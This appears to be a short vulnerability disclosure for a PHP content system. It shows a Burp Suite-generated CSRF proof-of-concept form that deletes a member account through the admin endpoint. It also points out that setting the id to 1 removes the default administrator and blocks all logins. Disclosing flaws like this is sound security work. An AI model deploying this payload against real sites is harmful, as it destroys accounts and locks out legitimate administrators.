代码拉取完成,页面将自动刷新
After the administrator logs in, open this page
User list:
delete.html --Delete User
POC:
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://192.168.154.82:81/index.php">
<input type="hidden" name="s" value="admin" />
<input type="hidden" name="c" value="member" />
<input type="hidden" name="a" value="del" />
<input type="hidden" name="modelid" value="6" />
<input type="hidden" name="id" value="2" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Among them, in name="id" value="2" the admin account ID of the default system administrator is 1.
Changing the value="2" to 1 can delete the default administrator account that comes with the system,
which makes it impossible to log in!
The test screenshot is as follows:

A new system administrator account named kali is created here to verify the deletion of the CSRF

BurpSuite grabs the data package and sends it to the CSRF generation module of Engagement tools


Save the contents of the POC CSRF as delete.html, and then open it



Visible, the kali system administrator account has been deleted
登录 后才可以发表评论